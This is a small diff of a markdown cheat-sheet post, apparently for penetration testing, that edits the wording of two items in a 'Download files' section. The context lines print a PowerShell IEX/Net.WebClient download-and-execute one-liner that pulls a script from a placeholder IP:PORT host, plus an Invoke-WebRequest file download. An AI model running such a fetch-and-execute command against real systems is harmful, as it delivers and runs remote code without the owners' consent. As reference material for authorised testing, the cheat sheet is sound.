datahackare/warz0ne/_posts/2021-03-31-CheatSheet.md

 ### [](#header-3)Download files

-Read and execute a file from a weblink.
+Read and execute a file from a weblink with powershell.

 ```
 Powershell IEX(New-Object Net.WebClient).DownloadString('http://IP:PORT/FILENAME')
 ```

-Download and output a file.
+Download and output a file from powershell.

 ```
 Powershell Invoke-WebRequest -Uri IPNUMMER:PORT/FILNAMN -OutFile FILENAME